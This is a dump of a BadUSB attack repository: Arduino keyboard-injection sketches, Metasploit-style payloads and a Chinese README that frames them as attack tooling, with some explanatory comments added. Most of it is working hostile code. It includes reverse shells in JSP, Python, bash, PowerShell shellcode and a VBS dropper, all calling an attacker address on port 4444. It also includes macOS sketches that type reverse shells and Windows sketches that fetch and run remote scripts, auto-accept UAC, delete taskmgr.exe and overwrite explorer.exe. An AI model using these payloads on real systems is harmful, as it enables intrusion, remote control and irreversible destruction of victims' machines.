sBpfsVCwFv = KIymDWTNS & "\" & "svchost.exe" Set ztgykKkZMO = eyulDLCNyPhly.CreateTextFile(sBpfsVCwFv,2,0) ztgykKkZMO.Write wvWPLP ztgykKkZMO.Close Dim iRUzZUgWeAViBB Set iRUzZUgWeAViBB = CreateObject("Wscript.Shell") iRUzZUgWeAViBB.run sBpfsVCwFv, 0, false End Sub gJjCrDeBtLBn %> ================================================ FILE: MSF_Trojanlinkage/shell.aspx ================================================ <%@ Page Language="C#" AutoEventWireup="true" %> <%@ Import Namespace="System.IO" %> ================================================ FILE: MSF_Trojanlinkage/shell.jsp ================================================ <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream ck; OutputStream zl; StreamConnector( InputStream ck, OutputStream zl ) { this.ck = ck; this.zl = zl; } public void run() { BufferedReader ov = null; BufferedWriter hgi = null; try { ov = new BufferedReader( new InputStreamReader( this.ck ) ); hgi = new BufferedWriter( new OutputStreamWriter( 
this.zl ) ); char buffer[] = new char[8192]; int length; while( ( length = ov.read( buffer, 0, buffer.length ) ) > 0 ) { hgi.write( buffer, 0, length ); hgi.flush(); } } catch( Exception e ){} try { if( ov != null ) ov.close(); if( hgi != null ) hgi.close(); } catch( Exception e ){} } } try { String ShellPath; if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) { ShellPath = new String("/bin/sh"); } else { ShellPath = new String("cmd.exe"); } Socket socket = new Socket( "192.168.43.242", 4444 ); Process process = Runtime.getRuntime().exec( ShellPath ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %> ================================================ FILE: MSF_Trojanlinkage/shell.php ================================================ /*fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' ================================================ FILE: MSF_Trojanlinkage/shell.psl ================================================ function yI6 { Param ($pwJF, $eI) $pk1l = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') return $pk1l.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($pk1l.GetMethod('GetModuleHandle')).Invoke($null, @($pwJF)))), $eI)) } function jQhd { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $iis, [Parameter(Position = 1)] [Type] $fM = [Void] ) $ndG = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $ndG.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $iis).SetImplementationFlags('Runtime, Managed') $ndG.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $fM, $iis).SetImplementationFlags('Runtime, Managed') return $ndG.CreateType() } [Byte[]]$iLgSz = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCABFcwKgr8kFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V") $zpx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll VirtualAlloc), (jQhd @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $iLgSz.Length,0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($iLgSz, 0, $zpx, $iLgSz.length) $sSYR = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll CreateThread), (jQhd @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zpx,[IntPtr]::Zero,0,[IntPtr]::Zero) [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll WaitForSingleObject), (jQhd @([IntPtr], [Int32]))).Invoke($sSYR,0xffffffff) | Out-Null 
================================================ FILE: MSF_Trojanlinkage/shell.py ================================================
# Metasploit-style Python reverse_tcp stager. The base64 string decodes to a script that tries a
# TCP connect to 192.168.43.242:4444 up to 10 times (5 s apart), reads a 4-byte big-endian length
# prefix, receives that many bytes of second-stage code and exec()s it with the socket bound as `s`.
# The dict keyed on sys.version_info[0] only chooses str (Py2) vs bytes (Py3) for the decoder input.
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguNDMuMjQyJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))
================================================ FILE: MSF_Trojanlinkage/shell.sh ================================================
# bash reverse shell over /dev/tcp: file descriptor 202 is opened read/write to 192.168.43.242:4444
# and sh's stdin, stdout and stderr are all redirected to it. /dev/tcp is a bash built-in, so this
# does nothing under dash or a plain POSIX sh.
0<&202-;exec 202<>/dev/tcp/192.168.43.242/4444;sh <&202 >&202 2>&202
================================================ FILE: OSX_Built-inReverseShell/OSX_SystemReverseConnection (dns_shell).ino ================================================
/* macOS HID-injection sketch (Teensyduino-style Keyboard API: set_modifier/set_key1/send_now).
   Opens Terminal through Spotlight and types a pipeline that pulls a base64 blob out of a DNS TXT
   record and pipes the decoded text into bash. INPUT0 is a placeholder for the attacker's domain. */
void setup() {
  delay(5000); // give the host time to enumerate the new keyboard
  run("terminal");
  delay(3000);
  Keyboard.print("nslookup -querytype=txt INPUT0 |");
  delay(200);
  // NOTE(review): this fragment turns the typed command into `... INPUT0 | INPUT0 |grep text ...`,
  // i.e. nslookup's output is piped into a program literally named INPUT0 — looks like a stray
  // duplicate of the placeholder rather than something intended.
  Keyboard.print(" INPUT0 |");
  delay(200);
  Keyboard.print("grep text | cut -d \" \" -f3-"); // isolate the quoted TXT record value
  delay(200);
  Keyboard.print(" | tr -d \"\\\"\" | base64 -D"); // strip the quotes; -D is decode on macOS base64
  delay(200);
  Keyboard.println(" | /bin/bash"); // Enter: whatever the TXT record held now runs
}
void loop() { }
/* Cmd+Space to open Spotlight, type the application name, press Enter. */
void run(char *SomeCommand){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  delay(500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}
================================================ FILE: OSX_Built-inReverseShell/OSX_SystemReverseConnection (perl_shell).ino ================================================
/* Same launcher pattern, typing a perl one-liner that forks and connects an IO::Socket::INET
   to INPUT0:INPUT1 (the remainder of the one-liner is typed in the rest of this sketch). */
void setup() {
  delay(5000);
  run("terminal");
  delay(3000);
  Keyboard.print("perl -MIO -e '$p=fork;exit,if");
  delay(100);
  Keyboard.print("($p);$c=new IO::Socket::INET");
  delay(100);
Keyboard.print("(PeerAddr,\"INPUT0:INPUT1\""); // INPUT0/INPUT1: attacker host and port placeholders
  delay(100);
  Keyboard.print(");STDIN->fdopen($c,r);$~->");
  delay(100);
  Keyboard.print("fdopen($c,w);system$_ ");
  delay(100);
  Keyboard.println("while<>;'"); // Enter: the forked perl child runs every line it reads from the socket
}
void loop() { }
/* Cmd+Space to open Spotlight, type the application name, press Enter. */
void run(char *SomeCommand){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  delay(500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}
================================================ FILE: OSX_Built-inReverseShell/OSX_SystemReverseConnection (ruby_shell).ino ================================================
/* Same pattern with ruby: forks, opens a TCPSocket to INPUT0:INPUT1 and, for each line received,
   runs it through IO.popen and writes the command output back to the socket. */
void setup() {
  delay(5000);
  run("terminal");
  delay(3000);
  Keyboard.print("ruby -rsocket -e 'exit if fork;");
  delay(100);
  Keyboard.print("c=TCPSocket.new");
  delay(100);
  Keyboard.print("(\"INPUT0\",\"INPUT1\"");
  delay(100);
  Keyboard.print(");while(cmd=c.gets);IO.popen");
  delay(100);
  Keyboard.println("(cmd,\"r\"){|io|c.print io.read}end'");
  delay(100);
}
void loop() { }
/* Cmd+Space to open Spotlight, type the application name, press Enter. */
void run(char *SomeCommand){
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();
  delay(500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}
================================================ FILE: PSL_FullScreen-HACKED/FullScreenHackedv0/FullScreenHackedv/FullScreenHackedv.ino ================================================
/* Windows HID-injection sketch (Arduino Keyboard library). Win+R opens a visible PowerShell, which
   then launches an elevated, hidden PowerShell that downloads http://fq.wc.lt/up/1459435782.ps1 to
   C:\Users\Public\get.ps1 and runs it. All text is typed in inverted case while Caps Lock is toggled
   on; the Site_AWord_IntrusionCode sketches explain why (typing goes wrong when a Chinese IME is
   active). The second stage is fetched from a third-party host over plain HTTP with no integrity
   check — whatever that URL serves at run time is what gets executed. */
void setup() { // initialisation
  Keyboard.begin(); // start keyboard emulation
  delay(5000); // wait for the host to enumerate the device
  Keyboard.press(KEY_LEFT_GUI); // Win key
  delay(500);
  Keyboard.press('r'); // r key -> Run dialog
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("POWERSHELL -NOP");
  delay(1000);
  Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://FQ.WC.LT/UP/1459435782.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT\" -vERB RUNAS;EXIT"); // -Verb RunAS: expect a UAC prompt
  delay(500);
  Keyboard.press(KEY_CAPS_LOCK); // restore Caps Lock
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end(); // stop keyboard emulation
}
void loop() // runs forever after setup()
{
  // Alt+Y every 50 ms — intended to press "Yes" on the UAC consent prompt raised by -Verb RunAS
  // (the FullScreenHackedv3 sketch labels the same chord "bypass uac"). It keeps firing for as
  // long as the device stays plugged in.
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(KEY_LEFT_ALT);
  delay(50);
}
================================================ FILE: PSL_FullScreen-HACKED/FullScreenHackedv0/get.ps1 ================================================
<# Second stage for FullScreenHackedv: drops an image to C:\x.jpg, points the HKCU wallpaper at it,
   refreshes the desktop with UpdatePerUserSystemParameters and force-kills explorer.exe (twice).
   Runs elevated because the launcher used -Verb RunAS. Forensic note: `cd \` is executed first,
   so `Remove-Item get.ps1` targets get.ps1 in the drive root (presumably C:\get.ps1) and the copy
   the launcher downloaded to C:\Users\Public\get.ps1 is left on disk. #>
cd \;
(New-Object System.Net.Webclient).DownloadFile("http://image.cnsc8.com/tupian_201501/Big_Pic/nRz13KeMr5.jpg","c:\x.jpg");
Start-Sleep -Seconds 5;
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d c:\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;
taskkill /F /IM explorer.exe;
Start-Sleep -Seconds 5;
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d c:\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;
taskkill /F /IM explorer.exe;
Remove-Item get.ps1;
exit;
================================================ FILE: PSL_FullScreen-HACKED/FullScreenHackedv2/FullScreenHackedv2.ino ================================================
/* Variant: one hidden, non-elevated PowerShell that IEX()s whatever pan.plyz.net/d.asp?u=1369254435&p=…
   returns, in memory, over plain HTTP with no integrity check (typed in inverted case under Caps
   Lock). Note the Win key and 'r' are still held while Caps Lock is toggled here. */
void setup() {
  Keyboard.begin();
  delay(5000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(500);
  Keyboard.press('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500);
  Keyboard.println("POWERSHELL -W HIDDEN -NOP -C \"IEX(nEW-oBJECT nET.wEBcLIENT).dOWNLOADsTRING('HTTP://PAN.PLYZ.NET/D.ASP?U=1369254435&P=sns.PS1')\";EXIT");
  Keyboard.press(KEY_CAPS_LOCK); // restore Caps Lock
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}
void loop() { }
================================================ FILE:
PSL_FullScreen-HACKED/FullScreenHackedv2/wall.ps1 ================================================
<# Destructive second stage (identical to FullScreenHackedv3[慎用]/get.ps1; 慎用 = "use with
   caution"). It downloads an image from a third-party CDN over plain HTTP, sets it as wallpaper via
   the HKCU Desktop values and the Policies\System values (the latter enforce it as policy, hence the
   gpupdate /force that follows), then takes ownership of explorer.exe and taskmgr.exe, deletes
   taskmgr.exe, kills explorer.exe and overwrites it with the text "123". After that explorer.exe is
   no longer a valid executable, so the Windows shell cannot start again — this does not undo itself.
   Needs an elevated session (the launcher sketch uses -Verb RunAS). #>
$down="$env:userprofile\Local Settings\Application Data\Microsoft\Wallpaper1.bmp"
(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);
start-sleep 5
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v `"WallpaperStyle`" /t reg_sz /d 2 /f"
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v WallpaperStyle /d "2" /f"
cmd /c "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"
cmd /c "gpupdate /force"
<# From here on the script is destructive: ownership + full control on two system binaries,
   then taskmgr.exe is deleted and explorer.exe is replaced by a three-byte text file. #>
cmd /c "takeown /f c:\windows\explorer.exe"
cmd /c "echo y `|cacls c:\windows\explorer.exe /g administrator:f"
cmd /c "icacls c:\windows\explorer.exe /grant administrator:f"
cmd /c "takeown /f C:\Windows\System32\taskmgr.exe"
cmd /c "echo y `|cacls C:\Windows\System32\taskmgr.exe /g administrator:f"
cmd /c "icacls c:\windows\System32\taskmgr.exe /grant administrator:f"
cmd /c "del /f /q C:\Windows\System32\taskmgr.exe"
cmd /c "taskkill /f /im explorer.exe&echo 123>c:\windows\explorer.exe"
================================================ FILE: PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/FullScreenHackedv3/FullScreenHackedv3.ino ================================================
/* Launcher for the destructive get.ps1 in this folder: Win+R -> visible PowerShell -> elevated
   hidden PowerShell that IEX()s whatever pan.plyz.net/d.asp?u=1235108351&p=get.ps1 returns.
   Typed in inverted case under Caps Lock; the second half of setup() follows in this file. */
void setup(){
  Keyboard.begin(); // start keyboard emulation
  delay(5000); // delay
  Keyboard.press(KEY_LEFT_GUI); // Win key
  delay(500);
  Keyboard.press('r'); // r key
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("POWERSHELL -NOP");
  Keyboard.println();
  delay(1000);
Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;IEX(nEW-OBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADsTRING(`'HTTP://PAN.PLYZ.NET/D.ASP?U=1235108351&P=GET.PS1`');EXIT\" -vERB RUNAS;EXIT"); // -Verb RunAS: elevated, expect a UAC prompt; remote script fetched over plain HTTP, no integrity check
  Keyboard.press(KEY_CAPS_LOCK); // restore Caps Lock
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end(); // stop keyboard emulation
}
void loop() // loop
{
  // bypass UAC — Alt+Y would press "Yes" on the consent prompt. Left disabled by the author:
  // "if you don't know how to use this block, don't; you bear the consequences".
  //Keyboard.press(KEY_LEFT_ALT);
  //Keyboard.print('y');
  //Keyboard.release(KEY_LEFT_ALT);
}
================================================ FILE: PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/get.ps1 ================================================
<# Destructive second stage (same as FullScreenHackedv2/wall.ps1 apart from the final echo). Sets a
   downloaded image as wallpaper through the HKCU Desktop values and the Policies\System values
   (enforced as policy, hence gpupdate /force), then takes ownership of explorer.exe and taskmgr.exe,
   deletes taskmgr.exe, kills explorer.exe and overwrites it with a one-character text file. The
   Windows shell cannot start again afterwards — this does not undo itself. Needs an elevated
   session, which the launcher sketch obtains with -Verb RunAS. #>
$down="$env:userprofile\Local Settings\Application Data\Microsoft\Wallpaper1.bmp"
(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);
start-sleep 5
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v `"WallpaperStyle`" /t reg_sz /d 2 /f"
cmd /c "reg add `"HKEY_CURRENT_USER\Control Panel\Desktop`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v Wallpaper /d `"%userProfile%\Local Settings\Application Data\Microsoft\Wallpaper1.bmp`" /f"
cmd /c "reg add `"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System`" /v WallpaperStyle /d "2" /f"
cmd /c "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"
cmd /c "gpupdate /force"
<# Destructive part: ownership + full control on two system binaries, then taskmgr.exe is deleted
   and explorer.exe is replaced by a text file. #>
cmd /c "takeown /f c:\windows\explorer.exe"
cmd /c "echo y `|cacls c:\windows\explorer.exe /g administrator:f"
cmd /c "icacls c:\windows\explorer.exe /grant administrator:f"
cmd /c "takeown /f C:\Windows\System32\taskmgr.exe"
cmd /c "echo y `|cacls C:\Windows\System32\taskmgr.exe /g administrator:f"
cmd /c "icacls c:\windows\System32\taskmgr.exe /grant administrator:f"
cmd /c "del /f /q C:\Windows\System32\taskmgr.exe"
cmd /c "taskkill /f /im explorer.exe&echo "h">c:\windows\explorer.exe"
================================================ FILE: README.cn.md ================================================ # BadUSB ![](https://img.shields.io/badge/BadUSB-fsociety-red)
该项目利用的并不是USB协议本身的漏洞,而是主机对USB设备自报告类型(HID键盘/鼠标)的无条件信任:通过更改USB设备的内部固件,在接入USB接口后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令。
![68747470733a2f2f696d616765732e67697465652e636f6d2f75706c6f6164732f696d616765732f323032312f303230322f3231333933325f36653462313436665f323332333636362e6a706567](https://user-images.githubusercontent.com/39434325/112772972-75a8e900-9066-11eb-9948-895916bf18ef.jpg)
#### QQ交流群:775942445 #### 加微信-进入交流群:wwy18795980897 ### 前言 和大多数人一样,最初见到BadUSB是在美剧《黑客军团》中,是fsociety组织常用的工具之一,无论是向服务器下载木马控制被害者主机,还是达琳在停车场帅气的扔出大量USB钓鱼,BadUSB都是功不可没的物理武器之一。 ![黑客军团](https://upload-images.jianshu.io/upload_images/11477676-71045c807dac0df6.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### 优势 在USB攻击领域,很多年前常用的是老式USB病毒(自动运行)autorun.inf,但该文件现在已经会被杀毒软件轻易地查杀。与autorun.inf不同,BadUSB不依赖U盘存储区中的任何文件,而是利用主机对USB设备自报告类型的信任:通过更改USB的内部固件,在正常的USB接口接入后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令。原文称此过程"不会引起杀毒软件、防火墙的一丝怀疑",这一说法并不准确:注入的命令仍以普通进程(cmd.exe、PowerShell、外联网络)运行,PowerShell脚本块日志与AMSI、EDR对新接入HID设备以非人类速度打字的检测、USB设备白名单以及出口流量过滤都能发现它。不过由于代码存在于固件而非存储区,U盘格式化确实无法阻止其内部代码的执行。 ![Leonardo_Arduino](https://upload-images.jianshu.io/upload_images/11477676-4347a3e41663dde6.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
我最喜欢的是Leonardo_Arduino板子,因为同样是对USB的利用,Windows、Linux、MAC等各类操作系统默认存在Leonardo_Arduino的USB HID接口驱动,不必联网下载专用的驱动程序。此外,向BadUSB烧录的程序极为简单,大部分是对键盘、鼠标按键进行模拟,上手较为容易。 BadUSB也是社会工程学的一个典型示例,它极大地利用了人们的好奇心,在路边捡到的USB,估计九成以上的人们都想看看里面有什么东西,而当你插入个人主机或公司内网,攻击就很难再停止下来了。
![BadUSB钓鱼](https://upload-images.jianshu.io/upload_images/11477676-3d1f812778254931.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### 教程 [具体步骤请移步至简书](https://www.jianshu.com/p/2b2b1dab85fe)
![操作步骤](https://upload-images.jianshu.io/upload_images/11477676-390539861bec703c.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### 目录导图
BadUSB │ LICENSE │ README.en.md │ README.md │ ├─BlueScreen蓝屏 │ BlueScreen蓝屏1(DOS).ino │ BlueScreen蓝屏2(DOS).ino │ BlueScreen蓝屏3(DOS).ino │ xp和win7的蓝屏代码(DOS攻击).ino │ 延迟蓝屏(DOS).ino │ 注册表写入致使开机蓝屏通用(DOS).ino │ 注册表写入致使开机蓝屏(DOS).ino │ ├─CobaltStrike木马联动 │ │ BitsAdmin木马执行(与CS联动).ino │ │ Pl木马执行(与CS联动).ino │ │ PSL木马执行(与CS联动).ino │ │ PY木马执行(与CS联动).ino │ │ Regsvr32木马执行(与CS联动).ino │ │ │ ├─CobaltStrike各种语言的Payload │ │ payload.bin │ │ payload.c │ │ payload.cs │ │ payload.java │ │ payload.pl │ │ payload.ps1 │ │ payload.py │ │ payload.rb │ │ payload.sct │ │ payload.txt │ │ payload.vba │ │ │ └─CounterStrike木马制作教程 │ CounterStrike.jpg │ CounterStrike木马制作教程.png │ ├─DNS劫持 │ DOS命令设置多个DNS(DNS劫持).ino │ PSL命令设置多个DNS(DNS劫持).ino │ ├─Linux内置反向Shell │ Linux内置的反向Shell(BashShell).ino │ Linux反向Shell(PerlShell).ino │ Linux反向Shell(代码执行).ino │ ├─MSF木马联动 │ shell.apk │ shell.asp │ shell.aspx │ shell.elf │ shell.exe │ shell.jar │ shell.jsp │ shell.macho │ shell.php │ shell.pl │ shell.psl │ shell.py │ shell.sh │ shell.war │ Shell木马生成配置.txt │ ├─OSX内置反向Shell │ osx系统反向连接(dns_shell).ino │ osx系统反向连接(perl_shell).ino │ osx系统反向连接(ruby_shell).ino │ ├─PSL全屏HACKED画面 │ ├─FullScreenHackedv0 │ │ │ get.ps1 │ │ │ │ │ └─FullScreenHackedv │ │ FullScreenHackedv.ino │ │ │ ├─FullScreenHackedv2 │ │ FullScreenHackedv2.ino │ │ wall.ps1 │ │ │ └─FullScreenHackedv3[慎用] │ │ get.ps1 │ │ │ └─FullScreenHackedv3 │ FullScreenHackedv3.ino │ ├─Ubuntu信息搜集 │ Ubuntu信息搜集到TXT文件(信息).ino │ Ubuntu的基本终端命令(显示).ino │ ├─WIFI密码获取 │ WIFI密码导出(工具).ino │ Wifi密码捕获(工具).ino │ ├─WIFI连接木马 │ 强迫连接指定WIFI并下载psl木马运行(木马入侵).ino │ ├─代码原理解读 │ arduino按键代码基础.ino │ MSF木马制作教程.txt │ 关于setup和loop方法的说明.txt │ ├─木马下载器 │ ├─CERTUTIL木马下载器(木马攻击)代码 │ │ 链接服务器msf木马certutil下载版.ino │ │ │ ├─FTP木马下载器(木马攻击)代码 │ │ FTP下载netcat并反向连接shell(木马攻击).ino │ │ │ ├─JAVA木马写入(木马攻击)代码 │ │ java木马写入(目标环境可运行Java).ino │ │ server.java │ │ │ ├─PSL木马下载器(木马攻击)代码 │ │ powershell下载服务器木马.ino │ │ psl木马下载器1(木马攻击).ino │ │ psl木马下载器2(木马攻击).ino │ │ psl木马下载器3通用(木马攻击).ino │ │ psl木马下载器4通用(木马攻击).ino │ │ 
psl木马下载器win&linux通用(木马攻击).ino │ │ psl木马写入并反弹(木马攻击).ino │ │ 下载psl木马并二次执行(木马攻击).ino │ │ 链接服务器msf木马psl下载版.ino │ │ 链接服务器psl下载版.ino │ │ │ └─PY木马下载器(木马攻击)代码 │ PyShellServer.py │ Py木马写入(目标环境可运行Python).ino │ ├─添加用户并开启服务 │ 添加用户并开启3389(工具).ino │ 添加用户并开启ftp(工具).ino │ ├─特定功能代码 │ Alt_F4循环关闭窗口后关机(工具).ino │ Shift后门(工具).ino │ 单纯改变所有用户密码(恶作剧项).ino │ 启动PSL远程连接功能(工具).ino │ 强制删除360各项进程(工具).ino │ 强制执行关机ShutDown命令(工具).ino │ 截屏并发送指定FTP地址(工具).ino │ 打开对方445端口(内网渗透).ino │ 打开指定网页(工具).ino │ 更改所用账户密码+关闭系统进程+蓝屏(工具).ino │ 添加用户代码(工具).ino │ 简简单单关个机(恶作剧项).ino │ 隐藏CMD窗口(显示).ino │ 鼠标不停移动(工具).ino │ ├─网站一句话入侵代码 │ aspx一句话木马写入(网站服务器版本-过狗过D盾).ino │ aspx一句话木马写入(网站服务器版本) .ino │ asp一句话木马写入(网站服务器版本-Script Encoder 加密).ino │ asp一句话木马写入(网站服务器版本-动态解码).ino │ asp一句话木马写入(网站服务器版本) .ino │ jsp一句话木马写入(jsp网站服务器使用).ino │ jsp木马写入(jsp网站服务器使用非一句话).ino │ php木马写入(php网站服务器使用-异或绕过).ino │ php木马写入(php网站服务器使用-类绕过).ino │ php木马写入(php网站服务器使用).ino │ └─运行U盘内的程序_扩大入侵范围 ├─UdiskRun │ UdiskRun.ino │ ├─UdiskRunv2 │ UdiskRunv2.ino │ └─UdiskRunv3 UdiskRunv3.ino ### 演示
[更改所用账户密码+关闭系统进程+蓝屏测试](https://www.yuque.com/u12074055/gzgwfh/dg804t)
![演示](https://upload-images.jianshu.io/upload_images/11477676-31390e8446540ca3.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### 进阶
网站一句话入侵
BadUSB&MSF联动
BadUSB&CS联动
WIFI局域网入侵
运行U盘内的程序_扩大入侵范围
![进阶](https://upload-images.jianshu.io/upload_images/11477676-cc6c47da713ac2e2.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)
### 解疑
